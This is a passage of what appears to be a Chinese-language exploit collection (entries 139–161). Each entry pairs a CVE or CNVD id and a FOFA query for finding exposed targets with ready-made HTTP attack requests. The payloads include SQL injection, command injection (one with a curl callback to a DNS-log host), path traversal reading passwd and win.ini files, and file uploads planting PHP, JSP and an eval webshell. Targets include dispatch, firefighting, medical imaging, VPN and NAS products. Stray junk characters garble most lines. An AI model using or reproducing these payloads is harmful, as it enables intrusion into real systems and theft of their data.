6 @: i; C8 }5 K/ y139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& W1 z4 O, O0 W0 l* \4 _CVE-2024-2622- F8 S8 o% g* ^2 L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"3 R6 N" J2 I2 U
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1 ~* V# R) H- }; k+ X, c. u
Host: x.x.x.x' ]+ B# ~4 M$ [" ~) v {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( v$ Z' w3 ~/ z4 }# r9 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 y }* Z. |5 j, ~0 s+ W5 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: O, v. j4 O: Y0 a% P' G5 _Accept-Encoding: gzip, deflate, br& F q) a% p; t9 ?& T
Connection: close' e N# Y: G6 C; r8 ~
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk8 a* g* t) Y1 g6 ] N) `
Upgrade-Insecure-Requests: 1
" s, d6 j' }$ }* H
% {0 t, Q0 [2 d' M
' g+ a5 X- B% l140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 R! q4 i% u. B$ t. Q% n, P
CVE-2024-2566( A: Z* y, K4 c% C, O' \
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. j5 _' b" m$ \0 p* ?) mGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
: g" a& s8 ^+ q( k9 Y) F5 tHost: x.x.x.x; R- @ c7 q% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* h- K9 v% u# h& l& O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ t M- W$ V, l, @% K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, B# U" p" T6 R9 v$ ~& {& n
Accept-Encoding: gzip, deflate, br
6 ?/ c- S0 @# R1 F1 s, [1 YConnection: close& i1 z' D+ |# c$ \( G* V- [4 K% r+ {
Cookie: authcode=h8g9
* l+ L+ y0 H% `, G: e5 _# BUpgrade-Insecure-Requests: 1, I; o t3 t: s+ g/ l) I
2 m0 ~7 z9 w+ O; c$ O# [
9 Q+ }6 @3 [. Y, u4 {# ^141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% R& D! w- {% F9 ~" C3 W& ^8 M
FOFA:body="指挥调度管理平台"
0 k k( |: S) m( dPOST /app/ext/ajax_users.php HTTP/1.11 g. n. V* Z/ |2 L) N3 y0 b$ \
Host: your-ip
- P1 D& [2 F: U; h0 j8 bUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 B D/ S7 `3 ]( f2 |1 wContent-Type: application/x-www-form-urlencoded" U6 r/ P+ K6 F, c9 ]9 ]
8 d. g0 O2 F6 c5 x! o: G
' Y9 t- y9 ^' ?! G1 R2 z' I. @dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 k4 J3 b- Q$ M( c, W
0 A. u" Z% z% e. o% J" H' d
7 L- T B: }' U" m% n5 ^) _7 [$ R142. CMSV6车辆监控平台系统中存在弱密码7 [5 _/ c, z. q3 j1 L2 p" `
CVE-2024-296669 c3 m' S* I7 `/ e4 g2 h; J. h& Y% {
FOFA:body="/808gps/"1 s4 i' `9 P; L' h- n
admin/admin& v* T0 V0 k: P5 J: @, Z
143. Netis WF2780 v2.1.40144 远程命令执行
5 F6 `; O9 \! n( p0 Z9 lCVE-2024-25850
7 {9 v! `3 e; P- X5 O: mFOFA:title='AP setup' && header='netis'3 b3 G/ I5 J8 x8 z
PAYLOAD
: X5 w, h2 H' \7 L# E& A6 c! w& p" {! q; ^- n0 e) c; M
144. D-Link nas_sharing.cgi 命令注入
3 t! s( t$ Q8 M3 pFOFA:app="D_Link-DNS-ShareCenter"# O! b1 W5 m' }% b0 U
system参数用于传要执行的命令 z+ ]6 w/ q9 I' p; \
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.14 S/ ~. ]% s1 V x2 Z% T
Host: x.x.x.x* D! c, v; ^! y: [8 c1 ~+ |
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
% P: V( p# N* X Z/ vConnection: close' X \3 U7 b4 @
Accept: */*: x& L3 v" S/ E9 D
Accept-Language: en0 M9 L/ U f( Y& o& w" c$ F
Accept-Encoding: gzip
7 R/ y# d! G0 d/ ]2 \2 t5 M! O8 X6 ~2 K
( `- U+ c; ? I; F145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. R/ \! I' r2 M5 R
CVE-2024-3400
& J. e+ F9 o/ o4 b9 I, g. j9 g, eFOFA:icon_hash="-631559155"2 a5 J5 `6 T* x/ r% L1 p3 {
GET /global-protect/login.esp HTTP/1.1
; {) O0 ?0 j5 MHost: 192.168.30.112:1005( H, ?+ @; n5 g T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
" N2 r2 i, n+ S+ ~' I' pConnection: close$ O$ O0 z4 ?$ G v; q
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
# F& p" r" D- S `; mAccept-Encoding: gzip
/ H. S& \4 y% R! A$ {- b% |$ B% f; S- `9 S# E
# ~: e' Q3 ^- T/ F) W( o z/ \' }146. MajorDoMo thumb.php 未授权远程代码执行3 l8 |# x8 [9 t2 F
CNVD-2024-02175
0 t/ d/ {3 L/ ?) `8 rFOFA:app="MajordomoSL"3 w5 W0 t @- ]+ u5 ~/ t+ z
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1" H- m$ `' L( h! [5 i1 r% w9 ]
Host: x.x.x.x
9 G9 G% W1 ]$ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
3 C% a7 r `8 ~Accept-Charset: utf-8
# {6 l* x: W; OAccept-Encoding: gzip, deflate
V6 g# S7 ?3 G: i( |2 a% dConnection: close
; |2 n7 U) t# Z0 l6 H: i7 X3 U3 s4 E
7 w" J1 ]7 W2 S8 M147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ i/ D9 j" ?- W; L( UCVE-2024-323991 c: k3 [+ k4 x& u. l% K
FOFA:body="RaidenMAILD"
5 b6 j s9 _% K$ p& HGET /webeditor/../../../windows/win.ini HTTP/1.1: K+ I' ~8 ^2 w
Host: 127.0.0.1:814 ^0 n. G3 x$ w- Q
Cache-Control: max-age=06 @: K, n6 L3 H# W% w9 r( [' h
Connection: close
, e+ M8 C* A0 t) e1 z, \
& A9 q$ u7 e0 H5 R; E% h3 T3 n5 m' }6 D' {# f
148. CrushFTP 认证绕过模板注入
% A r. _; L8 ~8 g6 M- o; x6 P* KCVE-2024-40406 B% Z0 `' ?( N$ }; h
FOFA:body="CrushFTP"
& @+ C, |! b wPAYLOAD
# c. T. t4 _' j& t1 a5 b' l
+ B& T6 l8 C: I s6 }149. AJ-Report开源数据大屏存在远程命令执行
# X1 X/ U( c2 D, }FOFA:title="AJ-Report"4 \% |* D% O; f- q* d
Y% q+ s% C+ [. fPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' y: q, v0 K" g* Y% m- I5 y, _. RHost: x.x.x.x6 J# c: i8 @! Z O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ t5 ?! n% h+ U% _+ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 M o$ c1 V" O
Accept-Encoding: gzip, deflate, br
' A( l3 ?- C1 m9 `& e MAccept-Language: zh-CN,zh;q=0.9
- U; _) |+ j* |* i( |9 ^7 xContent-Type: application/json;charset=UTF-82 P. ~$ H) _8 j
Connection: close0 R G8 N( h& H8 y& `
$ T8 y$ W3 _" K) _( D9 W5 u
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}* q: X+ A& |& w. h# I5 M
* ^$ T/ Q! q1 D9 c3 n7 D) V( N! u150. AJ-Report 1.4.0 认证绕过与远程代码执行
. n9 C! Z9 K* A. M" LFOFA:title="AJ-Report"% I# C# e+ [9 N4 ]' e% b4 N
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 ~+ j9 a$ |2 P7 ?) _1 U8 I: GHost: x.x.x.x
8 N. T+ y2 Y W* S2 G& K0 P+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! u c) ?% R( l% ?- u$ b0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Z, J9 T: n' s1 H, _Accept-Encoding: gzip, deflate, br
& t( T; u, z' L. |- ^Accept-Language: zh-CN,zh;q=0.9
8 s* P w5 E, B# z9 sContent-Type: application/json;charset=UTF-8
" c, U+ K2 O& x( h" d* oConnection: close
+ G6 F( g5 C9 J4 S' T! K FContent-Length: 339$ d8 u D$ q l7 I* |1 w8 f! ?
3 V" [: L/ u5 d" q, z1 F F$ f
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 q+ l9 x6 `+ w- w: [
& \) i" B( W# z6 P% q5 J2 E& S9 y: F
; i7 c0 N& R# O$ u7 S5 y151. AJ-Report 1.4.1 pageList sql注入. _& r$ b% y1 _9 Q4 O! ?
FOFA:title="AJ-Report"
% ?8 u: Y7 H' ~/ {4 o2 Y# K1 eGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1( E# c) D p, M+ a% D8 w
Host: x.x.x.x
. d5 b- I8 l' I1 n2 X" {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& ~# K! i8 i3 sConnection: close, Y: }5 o+ d) F _) F( Z2 a2 v
Accept-Encoding: gzip0 G4 H0 d5 E. }
; m2 \3 G* l" T q
" h; j/ L0 e$ W152. Progress Kemp LoadMaster 远程命令执行
) [! ~5 f6 l0 P# ^- t& v- sCVE-2024-1212
. Y" ^7 _ O1 t. c+ r1 f2 oLoadMaster <= 7.2.59.2 (GA)
/ @: t8 m, T1 q) }, c" x/ u# d' DLoadMaster<=7.2.54.8 (LTSF)
6 U( `6 V% l. a0 dLoadMaster <= 7.2.48.10 (LTS)5 }8 g& d8 {( C6 b( ?$ ?. e* n& ?' ~
FOFA:body="LoadMaster"
. [5 N, y9 h+ I. V% aJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 P8 j3 u% n. j. E7 F1 C1 jGET /access/set?param=enableapi&value=1 HTTP/1.1
7 w' m0 E7 W% DHost: x.x.x.x
+ U, L2 F# v4 y/ v& h* oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.15 \/ n: C' q* @+ m; r8 N u, |4 j
Connection: close
7 q% q9 _$ W0 r6 r& ]) I3 NAccept: */*
; |. u: S: q: t. v$ I7 R% QAccept-Language: en. X+ l/ Y. z' n) s3 q
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=- S) J2 l; f3 Q0 W; L- O( d
Accept-Encoding: gzip( P! {6 h2 Y( _
! W w; { G" B% F
( \& ]; g+ B! O( p. m153. gradio任意文件读取
4 m$ d1 ]9 h+ j# S& [8 d( eCVE-2024-1561FOFA:body="__gradio_mode__"8 Z. }8 N O, y( m+ ]- c4 S& \
第一步,请求/config文件获取componets的id
5 ~; P! J. {4 h% e! q6 ghttp://x.x.x.x/config
; `2 u3 I, ]* u% }5 l; r
4 J! z5 _/ f( G
& K+ [6 e' c. `第二步,将/etc/passwd的内容写入到一个临时文件4 u$ j& t$ Y2 l$ O; c: L8 ^5 M
POST /component_server HTTP/1.1
s5 j3 F- U' i2 yHost: x.x.x.x
2 V6 l- o& R8 ^* K/ h9 ~- TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' {+ z, E- T/ f& Q7 H* QConnection: close/ W8 K+ B5 i0 S+ G6 b
Content-Length: 115# ~' `1 D4 C9 J; s
Content-Type: application/json
. e4 _6 d3 Z2 r9 rAccept-Encoding: gzip9 g5 m8 G8 N' j' \+ H
9 D- u: t& r! K4 Y
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}" O6 a0 \9 H: N1 d0 }
& x# t& q$ {- r1 P5 n% D& y: A0 r! @) N8 ^
第三步访问3 A2 g' |- _5 O9 ?% s, K; W# S$ x
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd6 |( ]+ z" U( @0 d2 i* x
5 e, k' H. Z0 O: A/ J l
* P1 w5 ^4 B! g" `1 W$ E4 O7 N, i154. 天维尔消防救援作战调度平台 SQL注入2 U$ t0 F$ @% |# W0 G
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"( ]2 ?& Y" @ N( U
POST /twms-service-mfs/mfsNotice/page HTTP/1.17 w& W6 ?8 R0 R8 E; ?" F
Host: x.x.x.x
9 ~3 A+ p% a6 `$ b0 X) ?1 CContent-Length: 1067 G }7 \3 Z) a: Z. c
Cache-Control: max-age=0
$ i9 E; q: ~' ?7 E e' E2 E! r/ p+ OUpgrade-Insecure-Requests: 13 [2 M6 c# `: b; o, }0 l
Origin: http://x.x.x.x
/ M) G) [% f8 hContent-Type: application/json
1 U8 g3 i' A1 W9 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
/ r: a- O+ i" z9 ^& X8 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' D# u7 W4 {5 Q6 b3 Q" u6 Y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 Q/ U0 c9 D+ m$ @/ g
Accept-Encoding: gzip, deflate
2 q. O1 m/ N0 w W" tAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
3 B% U0 U7 u3 D* MConnection: close( d6 V Z' A2 m& V* K
* m& ~1 G0 G$ O5 o
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}) V4 l2 i d% l; P( \1 D
) f7 c' c6 [; \
6 [8 Q) _9 V1 ~/ u% S3 [155. 六零导航页 file.php 任意文件上传7 {3 F# S- b: {
CVE-2024-34982
+ V' c U/ q: j( z8 L4 XFOFA:title=="上网导航 - LyLme Spage"
F l5 A, N. Z% l: `5 J1 o4 ZPOST /include/file.php HTTP/1.1
, K4 K# F8 J9 YHost: x.x.x.x, J5 w! p. e# [: k" O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 b; D; n+ V( i6 B+ c; ^
Connection: close
4 C* d& W' p* o6 A N6 ZContent-Length: 232% h1 g2 `/ E0 E
Accept: application/json, text/javascript, */*; q=0.01
4 W3 w" y6 z- d+ E0 ?/ ^8 kAccept-Encoding: gzip, deflate, br
* h( G6 ?4 i9 D, ^6 b3 p, D o' eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. L) O+ d3 i9 [/ Y
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f8 b B* y% b5 M& s0 m% N
X-Requested-With: XMLHttpRequest
3 a: k' E8 z/ f( I
! s' n4 J) N1 l' j5 b3 R-----------------------------qttl7vemrsold314zg0f8 p+ ?+ x' |+ E9 S2 o6 U- E
Content-Disposition: form-data; name="file"; filename="test.php"
* r. I* t4 y% x* t# N7 n; B$ e1 rContent-Type: image/png6 N( J) }# e! {: A+ Y
; X9 Z( }& A/ c' v2 c, c
<?php phpinfo();unlink(__FILE__);?>, A3 I* K/ M$ C1 \: D! @% n: m' `
-----------------------------qttl7vemrsold314zg0f--9 Z+ V* k. p0 d' t* u
. n2 w5 j1 u8 N, j
2 c- C& B0 H N. o; b' V1 D2 g
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php& R; ~, X4 _ L6 S
/ I+ m( @" S' a' D# K2 I
156. TBK DVR-4104/DVR-4216 操作系统命令注入
- n/ U4 G/ X) j9 x5 Y1 v# CCVE-2024-37210 z0 e0 u+ O& [! Q6 S! l4 k
FOFA:"Location: /login.rsp"
0 ^. v& I# b% M; d3 X·TBK DVR-41045 P% z% L1 i; y# W. S9 Z
·TBK DVR-42160 `6 X' l$ A/ u; g9 F" r
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"/ Y$ L! g8 _0 y% g2 P3 B4 K
4 \/ r6 @; p1 C: [$ d' q% A& }) v) p' S9 u
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
$ o( C- e! Z3 m7 P3 q7 d) _Host: x.x.x.x( G8 ^6 r. u/ _; U
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 {1 n" Z; ?5 ?' dConnection: close
" B: q8 M, d2 B2 Y7 [Content-Length: 0
' B* S3 T- H" b6 F1 D0 ACookie: uid=1+ f: r$ g2 a+ v) S. o/ F
Accept-Encoding: gzip0 e) z3 D. O# v# m( x6 i5 y
) _5 }, t) U2 ]2 z; h) ]3 A+ E
' S: G' z3 W( N+ c ^& j; ?6 e$ G157. 美特CRM upload.jsp 任意文件上传
% i9 t& V2 Z$ l& ZCNVD-2023-069713 B" @/ r, l* u, X) t
FOFA:body="/common/scripts/basic.js"
5 R; Y' r/ b# r, }( G9 NPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1) ~' y3 y. O( ^+ P8 X
Host: x.x.x.x
$ [0 W& V s# b* _' L1 W1 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' Z K0 x' k8 ?) u' F
Content-Length: 709
1 i0 K: \/ z2 v% h9 Q4 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ n4 e5 z3 E3 N) _) {
Accept-Encoding: gzip, deflate
e! f& l% f7 s( }; p7 xAccept-Language: zh-CN,zh;q=0.9: b) A3 M. m; n0 T# l$ @
Cache-Control: max-age=0
& W* R: S3 g3 i6 _* QConnection: close, v; I0 O5 E1 ?4 l' y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. _8 K7 \% K3 K6 T, BUpgrade-Insecure-Requests: 12 ^8 T8 y/ L+ K* [: E8 u, X& }
% E. s, I3 i5 ?: p5 B2 u- p
------WebKitFormBoundary1imovELzPsfzp5dN2 r* b; y& y' o {# D2 R
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
* W0 M) Q- o( F5 W, D. bContent-Type: application/octet-stream+ b3 }3 T- P6 q0 @. \! m- A
* { c& f2 r) w# m) |& Ynyhelxrutzwhrsvsrafb
7 ^; Y, q' P& y------WebKitFormBoundary1imovELzPsfzp5dN* `8 \# o! C2 l" A o3 @. Y5 W+ g
Content-Disposition: form-data; name="key"+ R7 k# u( q* s! a1 j) K
' A+ i6 g) B# e5 c! r j& a
null t- g% r$ j! C8 ?+ @" y
------WebKitFormBoundary1imovELzPsfzp5dN2 S2 j! O8 k( o0 U5 ?9 W% a
Content-Disposition: form-data; name="form"
9 R& V1 Y8 ?) k
3 B5 L- `$ j8 i F; Y Wnull
% ?( q$ e% g s. w* i------WebKitFormBoundary1imovELzPsfzp5dN* O& | C9 l% Q9 k$ f+ c/ A
Content-Disposition: form-data; name="field"
- D* q* t2 W( _. m% a s4 q7 b; E# n f7 P. F1 P6 U
null
+ N/ P. K: ~4 R- v' _------WebKitFormBoundary1imovELzPsfzp5dN: r6 l+ a# w l2 S
Content-Disposition: form-data; name="filetitile"7 J/ Q' O) A, H, d
0 `5 }1 p( z. W) H. ~7 u
null' v2 u) M. x* q6 @
------WebKitFormBoundary1imovELzPsfzp5dN* h8 B/ ~5 A' F! E/ c2 i6 l9 S( m5 n
Content-Disposition: form-data; name="filefolder"9 f/ I4 `6 b; G w- o& h2 o: D
. U4 P5 @! r( ?' W/ [null
( B, C+ x: F! m2 ^! X------WebKitFormBoundary1imovELzPsfzp5dN--
, p) J* ~& a9 l" |! {1 B3 K+ }) A. \/ W s
' `+ S/ u0 v( `* I1 C! l& g+ Nhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp: R. @) h( x( t
' `6 n% h$ u4 `% f
158. Mura-CMS-processAsyncObject存在SQL注入
6 G. _5 Q! S2 K4 c7 aCVE-2024-32640 F3 Y: P8 z, W4 V. Y% c
FOFA:"Generator: Masa CMS"$ M- Z. L: |1 {; p" d8 w+ R
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 e4 z* a7 n* b% t
Host: {{Hostname}}
9 Y0 d7 f; r+ p# a- j4 zContent-Type: application/x-www-form-urlencoded% i$ ]. g# u# S% D3 o" f# H7 f
% A v" E9 b7 h; _+ s. T
object=displayregion&contenthistid=x\'&previewid=1' Q, d$ S3 u: m7 Y8 }: [$ U
, {6 _, F2 N \% V9 w H6 v" O5 n/ \1 Z5 V
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传 z% M1 d, |2 ~# V' b
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 {6 B+ E( d+ a, Z; k2 J. J
POST /webservices/WebJobUpload.asmx HTTP/1.1( @+ Y6 Y: E, S% y" x- X
Host: x.x.x.x
( {4 Q9 L8 C+ H" o4 j" wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' }+ y1 W/ T/ X0 h! A
Content-Length: 1080
$ \: _' ^/ X. \ {2 h, CAccept-Encoding: gzip, deflate
) X6 u! @7 o) d7 vConnection: close% l* v' r. O3 A
Content-Type: text/xml; charset=utf-8
7 D$ V5 O2 ^/ K( H' `Soapaction: "http://rainier/jobUpload"
0 m* @9 ^5 @- m! c7 w" |; u6 J$ c2 f$ ]' y( P
<?xml version="1.0" encoding="utf-8"?>1 Z w% h% V% i9 u, a2 b
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! S5 n2 M* _% {( p8 j# B<soap:Body>7 j, L" b4 q. Y3 u1 k: Q$ `
<jobUpload xmlns="http://rainier">
! I0 s, Y- y1 J6 s+ c<vcode>1</vcode>
" u6 X% a. m# }# Z<subFolder></subFolder>: R7 v4 B; c/ n6 R) A, q! v
<fileName>abcrce.asmx</fileName>) B3 V' @2 r0 f2 H( f
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
) u& i7 i" ~% T; ]( V0 U( y/ G2 y</jobUpload>9 n0 I# l( U! y5 [ l5 p" Y
</soap:Body>
! S$ b( \, U+ k9 g* i) z5 T</soap:Envelope>" u( p7 ~! R4 C4 j
/ `, L; r1 x- I; i
- M" w7 H$ z& g/ f6 f% r* j/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* L4 N8 F0 x% z& A! ?7 G
7 l% r( Z# {# J, l8 K4 P3 H V* m
160. Sonatype Nexus Repository 3目录遍历与文件读取9 n7 T+ w Y0 Q
CVE-2024-49565 `$ a5 U; O- P. M4 P9 O0 [
FOFA:title="Nexus Repository Manager"
( |( f7 ]1 D( C+ SGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1/ ~6 }6 d, o- ]3 h$ F" |# y
Host: x.x.x.x
+ F( k" [- d4 G2 U6 q& mUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
- w$ J* v' @' h+ J& X( P( i4 ]0 MConnection: close f+ s w1 U6 G0 X4 ^
Accept: */*+ e" m# S& b; \2 _, A% R
Accept-Language: en
: {3 s9 z! P. v7 E8 E. i" PAccept-Encoding: gzip
, b& P0 J/ A: X1 A, k- v4 Z) k. A8 J! @7 O3 Y+ G
) d7 b, Z+ W! c" G- h1 ]161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
' O5 C$ ~$ n5 P6 gFOFA:body="/KT_Css/qd_defaul.css"
' R; T* P" E0 T$ ]6 U第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
. {$ B9 d# M5 W' ]! NPOST /Webservice.asmx HTTP/1.1$ j# y( q& M4 ?4 v
Host: x.x.x.x
) ~/ F6 V, C4 ]8 S% n8 y- QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# k+ K3 |; k# ^8 N, {( PConnection: close
* a1 o1 S% ], }! y. v8 kContent-Length: 445
! b8 C; S3 c- f% QContent-Type: text/xml
5 \0 x6 b2 H) N7 ^( R1 SAccept-Encoding: gzip# o2 R0 `6 H4 _* r: B1 Q( m: f0 I
/ U6 B" p* X& {<?xml version="1.0" encoding="utf-8"?>% d* d. O$ C9 \ B1 I: Q
<soap:Envelope xmlns:xsi="' x! f; Q/ o; h- m9 k/ ^' X2 s
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"1 K) x9 h* T, b( h
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">) U) P4 T" c& ~0 v
<soap:Body>9 d. M% e* {6 w8 ?5 I* s
<UploadResume xmlns="http://tempuri.org/">
5 k3 O! a0 m0 b<ip>1</ip>
